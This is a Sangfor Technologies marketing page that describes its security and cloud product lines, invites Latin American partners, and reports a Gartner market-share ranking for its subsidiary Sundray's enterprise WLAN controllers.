Sangfor Security products and solutions

  • Sangfor Network Secure: An industry-leading AI-enabled Next-Generation Firewall (NGFW) with integrated WAF and deception technology. Recognized as a Visionary in the Gartner Magic Quadrant for Network Firewalls.
  • Sangfor Endpoint Secure: A comprehensive endpoint security solution that can stop ransomware in under a few seconds, as demonstrated by attaining perfect scores in zero-day and ransomware tests conducted by AV-Test.
  • Sangfor Cyber Command: An advanced Network Detection & Response (NDR) platform with extensive, purpose-built AI models to detect advanced and unknown cyber threats.
  • Sangfor Internet Access Gateway: A full-featured Secure Web Gateway (SWG) offering internet access control, data loss prevention, and more.
  • Sangfor Anti-Ransomware Solution: This solution mitigates ransomware attacks by "breaking every step in the kill chain," making it the complete, holistic solution against ransomware.
  • Sangfor Simplified Security Operations Solution: Provides organizations with the essential technologies, human expertise, and proven processes to establish and run professional yet simplified security operations (SecOps).

Sangfor Cloud products and solutions

  • Sangfor Hyperconverged Infrastructure (HCI): The world’s first 3rd generation HCI platform that integrates compute, storage, networking, and security. It serves a wide range of digital transformation use cases, like software-defined data center, disaster recovery, and private cloud, with high performance, simplicity, stability, and security.
  • Sangfor Virtual Desktop Infrastructure (VDI): A one-stop VDI solution that helps your business evolve effortlessly from traditional PCs to a virtual desktop workspace. Through deeply integrated server, desktop, and application virtualization, it allows for simple management and secure, efficient work from any device, location, and time.
  • Sangfor Unified Hybrid Cloud: Sangfor’s hybrid cloud solution uses the same HCI infrastructure for both private and managed clouds. This setup provides seamless integration, unified management, and consistent operations and security, reducing the learning curve of cloud technologies and enabling a smoother cloud journey. It is ideal for use cases like data center extension to the cloud, hybrid workload placement, and disaster recovery.

Welcoming New Partners

As part of its expansion plans, Sangfor Technologies welcomes new partners in Latin America to join forces in delivering exceptional services to local customers. By partnering with Sangfor, you will gain access to:

  • The latest cutting-edge technology in security and cloud
  • Partner development programs with certifications
  • Market Development Fund and exclusive sales incentives
  • A global network with collaboration opportunities
  • Project protection
  • Modular solutions for cross-selling and upselling

This partnership offers a unique opportunity for companies with experience in cybersecurity or cloud services and a deep understanding of the Latin American market to collaborate with a renowned industry leader with over 100,000 global customers. Sangfor is recognized by independent analyst firms, including Gartner, Forrester, IDC, and Frost & Sullivan, and cooperates with top-tier technology giants such as Intel, Nvidia, AMD, Microsoft, and SAP. Additionally, its products undergo regular testing by leading independent test organizations like AV-Test and CyberRatings.

Join us in this exciting journey as we expand our footprint in Latin America and work towards creating a secure and agile digital environment. We invite interested parties to contact us for more information and apply through our partner application form at https://www.sangfor.com/partners/partner-application-form.

About Sangfor Technologies

Sangfor Technologies is a leading global provider of cybersecurity and cloud solutions dedicated to helping organizations navigate the complexities of the digital world. With a strong focus on innovation and customer satisfaction, Sangfor Technologies offers a comprehensive portfolio of cutting-edge products and services designed to protect and empower businesses in the ever-evolving digital landscape. With the expansion into Latin America, Sangfor Technologies aims to bring its expertise and industry-leading solutions to organizations across the region, enabling them to thrive in the digital era.

For media inquiries, please contact:
Email: pr@sangfor.com
Website: www.sangfor.com


News

Sangfor Technologies Ranked as a Global Top 5 Vendor for Enterprise WLAN Controllers in Gartner® Market Share

A Global Top 5 Vendor for Enterprise WLAN Controllers

Gartner recently released "Market Share: Enterprise Network Equipment by Market Segment, Worldwide, 1Q23" [1]. According to the report, Sangfor Technologies (via its subsidiary Sundray Technology) ranked among the top five vendors in the world for Enterprise WLAN Controller by revenue in 2022 and Q1 of 2023. We believe our success is attributed to our superior networking products, which have garnered significant market recognition.

Sundray Technology (hereafter referred to as Sundray) is a wholly-owned subsidiary of Sangfor Technologies (hereafter referred to as Sangfor). Founded in 2000, Sangfor has established four core business segments: cyber security, cloud computing, IT infrastructure, and IoT. Under this structure, Sangfor specializes in cyber security and cloud computing, while Sundray concentrates on network infrastructure and IoT.

Tackling Modern Network Challenges Through Industry Specialization

Digital transformation is driving new challenges in enterprise networks. As cyber threats advance and multiply, concerns about data and network security have intensified. Network maintenance challenges have also become more pronounced, prompting companies to seek more efficient and intelligent solutions. AI technology has emerged as a critical tool for enhancing network performance and resilience, from network monitoring to swift AI-driven interventions. These trends are shaping the future of enterprise networks, fueling continuous innovations and advancements in networking technology.

Sundray’s achievements are attributed to its consistent focus on industry specialization, catering to the complex demands of sectors like healthcare, finance, education, manufacturing, commerce, and government. In constantly refining our understanding of customer needs, we've delved deep into unique industry requirements and challenges, making regular product refinements based on market feedback.

Our enterprise WLAN controllers excel in terms of flexibility and scalability, meeting the intricate demands of various industries. In the healthcare sector, for example, we offer highly secure and stable wireless network solutions to support modern mobile healthcare and remote medical services. In finance, our high-performance and reliable wireless networks ensure the utmost security and user experience. For education, we provide easily managed, integrated wireless networks for seamless connectivity among students and staff.

About Sundray Enterprise WLAN Controllers

Sundray’s enterprise-grade WLAN controllers are proprietary high-performance networking devices. They are equipped to manage a broad spectrum of Sundray products, including network access points and switches. The devices integrate a range of functionalities, from Sundray's next-gen network controllers to firewall systems and unified wired and wireless management systems. Supporting multiple authentication methods, detailed user behavior management, flexible QoS control, integrated wired and wireless management, and the ability to detect, locate, and block potential network threats, we offer users a unified, convenient, secure, efficient, and flexible network management platform.

Sundray's innovation trajectory in WLAN controller products mirrors Sangfor's relentless pursuit of technical excellence. Embracing a customer-first ethos, we consistently innovate to meet core business needs, aspiring to develop best-in-class, technologically superior wireless enterprise solutions.

Sources

1. Gartner, Inc., Market Share: Enterprise Network Equipment by Market Segment, Worldwide, 1Q23, By Christian Canales et al., Published July 7, 2023

Disclaimer

GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.


Reviews of Sangfor Cyber Command Customers on Gartner Peer Insights
